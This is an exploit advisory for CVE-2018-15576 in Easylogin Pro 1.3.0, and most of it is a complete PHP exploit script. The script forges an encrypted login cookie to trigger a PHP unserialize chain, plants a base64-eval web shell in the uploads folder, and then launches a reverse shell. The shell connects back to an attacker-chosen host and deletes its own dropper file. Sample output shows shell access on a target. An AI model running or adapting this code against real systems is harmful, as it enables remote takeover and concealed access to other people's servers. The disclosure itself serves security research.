Easylogin Pro 1.3.0 Remote Code Execution

Credit: mr_me
Risk: High
Local: No
Remote: Yes

CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/php <?php /* Easylogin Pro Encryptor.php Unserialize Remote Code Execution Vulnerability Version: 1.3.0 Platform: Ubuntu Server 18.04.1 Bug found by: @f99942 Tekniq/exploit by: @steventseeley (mr_me) CVE: CVE-2018-15576 Notes: ====== - This is not really a security issue I guess, because you need to know the key. But a simple disclosure bug could mean its game over for Easylogin Pro - You will need PHP with threading support to run this exploit - Laravel + Guzzle === lol Example: ======== mr_me@pluto:~$ php -m | grep pthreads && php --version pthreads PHP 7.2.2 (cli) (built: Aug 10 2018 01:30:10) ( ZTS DEBUG ) Copyright (c) 1997-2018 The PHP Group Zend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies with Zend OPcache v7.2.2, Copyright (c) 1999-2018, by Zend Technologies mr_me@pluto:~$ ./e.php Easylogin Pro <= v1.3.0 Encryptor.php Unserialize Remote Code Execution Vulnerability Bug found by: @f99942 Tekniq/exploit by: @steventseeley (mr_me) ---------------------------------------------------- Usage: php ./e.php -t <ip> -c <ip:port> -t: target server (ip with or without port) -c: connectback server (ip and port) Example: php ./e.php -t -c ---------------------------------------------------- mr_me@pluto:~$ ./e.php -t -c Easylogin Pro <= v1.3.0 Encryptor.php Unserialize Remote Code Execution Vulnerability bug found by: @f99942 tekniq/exploit by: @steventseeley (mr_me) (+) snap... (+) crackle... (+) pop! (+) connectback from via port 41860 www-data@target:/var/www/html/uploads$ id;uname -a uid=33(www-data) gid=33(www-data) groups=33(www-data) Linux target 4.15.0-30-generic #32-Ubuntu SMP Thu Jul 26 17:42:43 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux www-data@target:/var/www/html/uploads$ ls -la total 12 drwxrwxrwx 2 www-data www-data 4096 Aug 12 23:06 . drwxr-xr-x 9 www-data www-data 4096 Aug 9 14:49 .. -rwxrwxrwx 1 root root 13 Dec 12 2017 .gitignore www-data@target:/var/www/html/uploads$ php --version PHP 7.2.7-0ubuntu0.18.04.2 (cli) (built: Jul 4 2018 16:55:24) ( NTS ) Copyright (c) 1997-2018 The PHP Group Zend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies with Zend OPcache v7.2.7-0ubuntu0.18.04.2, Copyright (c) 1999-2018, by Zend Technologies www-data@target:/var/www/html/uploads$ */ namespace GuzzleHttp\Cookie; // change these to work against your target $key = "OPudCtPyxzAGw8LkQowOoQAc88dvULGB"; $path = "/var/www/html"; class Encrypter { protected $key; protected $cipher; public function __construct($key, $cipher = 'AES-256-CBC'){ $key = (string) $key; $this->key = $key; $this->cipher = $cipher; } public function encrypt($value, $serialize = true){ $iv = random_bytes(openssl_cipher_iv_length($this->cipher)); $value = openssl_encrypt( $serialize ? serialize($value) : $value, $this->cipher, $this->key, 0, $iv ); if ($value === false) { throw new EncryptException('Could not encrypt the data.'); } $mac = $this->hash($iv = base64_encode($iv), $value); $json = json_encode(compact('iv', 'value', 'mac')); if (json_last_error() !== JSON_ERROR_NONE) { throw new EncryptException('Could not encrypt the data.'); } return base64_encode($json); } public function encryptString($value){ return $this->encrypt($value, false); } protected function hash($iv, $value){ return hash_hmac('sha256', $iv.$value, $this->key); } } // pop chain interface ToArrayInterface {} class SetCookie implements ToArrayInterface { private $data; public function __construct(array $data = []){ $this->data = $data; } } class CookieJar implements ToArrayInterface { private $cookies; public function setCookie(SetCookie $cookie){ $this->cookies = array($cookie); } } class FileCookieJar extends CookieJar { private $filename; public function __construct($bd_file, $cbh, $cbp){ $this->filename = $bd_file; $this->setCookie(new SetCookie(array( "Value" => '<?php eval(base64_decode($_SERVER[HTTP_SI])); ?>', "Expires" => true, "Discard" => false, ))); } } class Exploit{ private $target; private $targetport; private $cbhost; private $cbport; private $key; private $path; public function __construct($t, $tp, $cbh, $cbp, $k, $p){ $this->target = $t; $this->targetport = $tp; $this->cbhost = $cbh; $this->cbport = $cbp; $this->key = $k; $this->path = $p; } public function run(){ // its possible to leak the path if app.php contains 'debug' => true // also, uploads is writable by default for avatars $fcj = new FileCookieJar("$this->path/uploads/si.php", $this->cbhost, $this->cbport); $e = new Encrypter($this->key); $this->p = $e->encryptString(serialize($fcj)); // hardcoded md5 of the class name 'Hazzard\Auth\Auth' for the cookie login $c = $this->do_get("index.php", array("Cookie: login_ac5456751dd3c394383a14228642391e=$this->p")); if ($c === 500){ print "(+) pop!\r\n"; // start our listener $s = new Shell($this->cbport); $s->start(); // msf reverse shell with some stuff modified $rs = <<<'PHP' @error_reporting(-1); @set_time_limit(0); @ignore_user_abort(1); $dis=@ini_get('disable_functions'); if(!empty($dis)){ $dis=preg_replace('/[, ]+/', ',', $dis); $dis=explode(',', $dis); $dis=array_map('trim', $dis); }else{ $dis=array(); } $ipaddr='[cbhost]'; $port=[cbport]; function PtdSlhY($c){ global $dis; if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) { $c=$c." 2>&1\n"; } ob_start(); system($c); $o=ob_get_contents(); ob_end_clean(); if (strlen($o) === 0){ $o = "NULL"; } return $o; } // we disappear like a fart in the wind @unlink("si.php"); $nofuncs='no exec functions'; $s=@fsockopen("tcp://$ipaddr",$port); while($c=fread($s,2048)){ $out = ''; if(substr($c,0,3) == 'cd '){ chdir(substr($c,3,-1)); }else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') { break; }else{ $out=PtdSlhY(substr($c,0,-1)); if($out===false){ fwrite($s, $nofuncs); break; } } fwrite($s,$out); } fclose($s); PHP; $rs = str_replace("[cbhost]", $this->cbhost, $rs); $rs = str_replace("[cbport]", $this->cbport, $rs); $php = base64_encode($rs); $this->do_get("uploads/si.php", array("si: $php")); } } private function do_get($p = "index.php", array $h = []){ $curl = curl_init(); curl_setopt_array($curl, array( CURLOPT_RETURNTRANSFER => 1, CURLOPT_URL => "http://$this->target/$p", CURLOPT_HTTPHEADER => $h, CURLOPT_PORT => (int) $this->targetport )); $resp = curl_exec($curl); return curl_getinfo($curl, CURLINFO_HTTP_CODE); } } class Shell extends \Thread{ private $cbport; public function __construct($cbp){ $this->cbport = $cbp; } public function run(){ $sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP); $ret = @socket_bind($sock, 0, (int) $this->cbport); $ret = @socket_listen($sock, 5); $msgsock = @socket_accept($sock); @socket_close($sock); $start = true; $fp = fopen("php://stdin", "r"); while(false !== @socket_select($r = array($msgsock))){ if ($start === true){ if (socket_getpeername($r[0], $a, $p) === true){ print "(+) connectback from $a via port $p\r\n"; $s = $this->exec_cmd($msgsock, "echo `whoami`@`hostname`:\n"); } } $start = false; // the pretty shells illusion print "\r\n".$s.$this->exec_cmd($msgsock, "echo `pwd`\n")."$ "; // get our command... $c = fgets($fp); // if the attacker enters nothing, continue... if (strpos("\n", $c) === 0){ continue; } if (strpos($c, "cd") === false){ print $this->exec_cmd($msgsock, $c); }elseif (strpos($c, "cd") !== false){ $this->exec_cmd($msgsock, $c, false); } if(in_array($c, array("exit\n", "quit\n"))){ break; } } fclose($fp); } private function exec_cmd($c, $cmd, $ret=true){ // send our command to the reverse shell @socket_write($c, $cmd, strlen($cmd)); if ($ret == true){ // we don't care to get the shell prompt back... $resp = trim(@socket_read($c, 2048, PHP_BINARY_READ)); if ($resp === "NULL"){ return ""; }else{ return $resp; } } } } print_r("\r\nEasylogin Pro <= v1.3.0 Encryptor.php Unserialize Remote Code Execution Vulnerability Bug found by: @f99942 Tekniq/exploit by: @steventseeley (mr_me)\r\n"); if ($argc < 3) { print_r(" ---------------------------------------------------- Usage: php ".$argv[0]." -t <ip> -c <ip:port> -t: target server (ip with or without port) -c: connectback server (ip and port) Example: php ".$argv[0]." -t -c ---------------------------------------------------- "); die; } function set_args($argv) { $_ARG = array(); foreach ($argv as $arg) { if (preg_match("/--([^=]+)=(.*)/", $arg, $reg)) { $_ARG[$reg[1]] = $reg[2]; } elseif(preg_match("/^-([a-zA-Z0-9])/", $arg, $reg)) { $_ARG[$reg[1]] = "true"; } else { $_ARG["input"][] = $arg; } } return $_ARG; } $args = set_args($argv); $host = $args["input"]["1"]; $cbsp = $args["input"]["2"]; if (strpos($host, ":") == true){ $host_and_port = explode(":", $host); $host = $host_and_port[0]; $port = $host_and_port[1]; }else{ $port = 80; } if (strpos($cbsp, ":") == true){ $cbhost_and_cbport = explode(":", $cbsp); $cbhost = $cbhost_and_cbport[0]; $cbport = $cbhost_and_cbport[1]; }else{ $cbport = 1337; } $ip_regex = "(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b)"; if ((preg_match($ip_regex, $host) === 1) && (preg_match($ip_regex, $cbhost) === 1)){ // exploit entry $poc = new Exploit($host, $port, $cbhost, $cbport, $key, $path); print "\r\n(+) snap...\r\n(+) crackle...\r\n"; $poc->run(); } /* eyJpdiI6InFGcWFDMW9aMEFwWmo2XC9RRkhxZ3JBPT0iLCJ2YWx1ZSI6IjdpVExUQWpaYVpu RjVVRElxczg1YUVpSWl2bEtXOVwvY3BVaDFkc0NNY0Y4NkhMME9XNE9PZHJxc0FhUFBlenpi VWtJSUNHWE9RYU5MQjVnOUgzUkt4RGc0QlE4TDNZSnpueFZlblVjM3NnVXFmeE0zSnZaRFA2 a2gxU1l2QlVYNW5pUkZEd3c2RFJWYnpqRFkyUmdOQW5vZkVtaFA0Y2JDRW1kUU5mNWtGdmh3 WDJWYlBmQU0rTkFwWExQOERWcEZDVTYzU255VEFaTzN4MzhZTEUxWElRbnNCZ1grWm9rN3Vh MzBzSnYrSGpjMmlRRWMxZWVTbDVhN29uOG1RazBJIiwibWFjIjoiOThmYTM5ZDc3M2FlMGVh NTI3ZWI2ZGNkODQ5N2ZmZmExNDA3YjdjYzYzMGRlODY3NDZmMjRkYTBiNmVjMGJmMCJ9 */ ?>

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